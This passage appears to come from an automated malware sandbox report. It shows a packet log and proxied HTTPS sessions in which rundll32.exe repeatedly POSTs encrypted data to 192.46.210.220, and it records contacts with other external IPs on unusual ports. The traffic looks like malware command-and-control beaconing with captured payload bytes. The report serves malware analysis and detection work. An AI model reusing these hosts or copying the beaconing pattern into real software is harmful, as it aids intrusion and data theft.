Oct 28, 2021 04:50:54.698976040 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:54.699004889 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:54.699304104 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:54.699369907 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:54.704368114 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:54.704484940 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:54.704530954 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:55.400660992 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:55.400758982 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:55.400779963 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:55.400801897 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:55.400839090 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:55.400867939 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:55.420069933 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:55.420104980 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:55.583523035 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:55.742544889 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:55.742635965 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:55.743609905 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:55.902653933 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:55.904530048 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:55.904598951 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.124793053 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.284044981 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:58.284946918 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:58.285027981 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.285758018 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.285861015 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.447355032 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:58.447385073 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:58.447402000 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:58.826340914 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:58.826365948 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:58.826469898 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.826508045 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.836498022 CEST  49749        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:50:58.995783091 CEST  808          49749      143.244.140.214  192.168.2.5
Oct 28, 2021 04:50:59.050050020 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.050092936 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:59.050178051 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.057816029 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.088453054 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.088469028 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:59.223125935 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:50:59.223294973 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.224311113 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.389524937 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:50:59.391211987 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:50:59.391293049 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.405404091 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.570940018 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:50:59.571019888 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.571580887 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.571760893 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:50:59.583471060 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:59.583657026 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.736922979 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:50:59.736958027 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:50:59.736978054 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:50:59.841114998 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.841133118 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:59.841514111 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:59.841562986 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.867501020 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.867614031 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:59.867650032 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:51:00.120742083 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:51:00.120780945 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:51:00.120882988 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:51:00.120935917 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:51:00.256504059 CEST  49754        6891       192.168.2.5      45.77.0.96
Oct 28, 2021 04:51:00.402481079 CEST  49757        8116       192.168.2.5      185.56.219.47
Oct 28, 2021 04:51:00.421737909 CEST  6891         49754      45.77.0.96       192.168.2.5
Oct 28, 2021 04:51:00.455048084 CEST  8116         49757      185.56.219.47    192.168.2.5
Oct 28, 2021 04:51:00.455142975 CEST  49757        8116       192.168.2.5      185.56.219.47
Oct 28, 2021 04:51:00.457473993 CEST  49757        8116       192.168.2.5      185.56.219.47
Oct 28, 2021 04:51:00.510821104 CEST  8116         49757      185.56.219.47    192.168.2.5
Oct 28, 2021 04:51:00.518872023 CEST  8116         49757      185.56.219.47    192.168.2.5
Oct 28, 2021 04:51:00.518901110 CEST  8116         49757      185.56.219.47    192.168.2.5
Oct 28, 2021 04:51:00.518953085 CEST  49757        8116       192.168.2.5      185.56.219.47
Oct 28, 2021 04:51:00.518976927 CEST  49757        8116       192.168.2.5      185.56.219.47
Oct 28, 2021 04:51:00.525098085 CEST  49757        8116       192.168.2.5      185.56.219.47
Oct 28, 2021 04:51:00.561952114 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:51:00.562041044 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:51:00.562055111 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:51:00.562076092 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:51:00.562103987 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:51:00.562143087 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:51:00.580276966 CEST  8116         49757      185.56.219.47    192.168.2.5
Oct 28, 2021 04:51:00.580378056 CEST  49757        8116       192.168.2.5      185.56.219.47
Oct 28, 2021 04:51:00.632910013 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:51:00.632945061 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:51:00.635210037 CEST  49757        8116       192.168.2.5      185.56.219.47

HTTP Request Dependency Graph

• 192.46.210.220

HTTPS Proxied Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.5  49748        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:50:54 UTC  0                   OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:50:54 UTC  0                   OUT        Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:50:55 UTC  4                   IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:50:55 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.5  49753        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:50:59 UTC  4                   OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:50:59 UTC  5                   OUT        Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:00 UTC  9                   IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:00 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
10          192.168.2.5  49790        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:17 UTC  49                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:17 UTC  49                  OUT        Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:18 UTC  54                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:18 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
11          192.168.2.5  49797        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:21 UTC  54                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:21 UTC  54                  OUT        Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:22 UTC  64                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:22 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
12          192.168.2.5  49798        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:22 UTC  59                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:22 UTC  59                  OUT        Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:22 UTC  64                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:22 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
13          192.168.2.5  49805        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:25 UTC  64                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:25 UTC  64                  OUT        Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:26 UTC  74                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:26 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
14          192.168.2.5  49806        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:25 UTC  69                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:25 UTC  69                  OUT        Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:26 UTC  74                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:26 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
15          192.168.2.5  49813        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:29 UTC  74                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:29 UTC  74                  OUT        Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:30 UTC  84                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:30 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
16          192.168.2.5  49814        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:29 UTC  79                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:29 UTC  79                  OUT        Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:30 UTC  84                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:30 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
17          192.168.2.5  49821        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:33 UTC  84                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:33 UTC  84                  OUT        Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:34 UTC  94                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:34 GMT
                                                        Content-Type: text/plain; charset=utf-8
